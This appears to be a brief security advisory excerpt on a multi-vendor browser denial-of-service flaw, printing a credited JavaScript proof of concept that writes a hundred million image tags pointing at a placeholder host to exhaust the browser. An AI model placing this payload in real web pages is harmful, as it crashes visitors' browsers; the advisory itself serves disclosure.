|
Multiple Vendor Image Count Denial of Service Vulnerability
The following has been provided by Pavel Titov <Pavel.Titov@mtu-net.ru> and is an example of how to exploit this issue: <script> for(i=0;i<100000000;i++) { document.write("<img src=http://fakehost.com/"+i+".gif>"); } </script> |
|
Privacy Statement |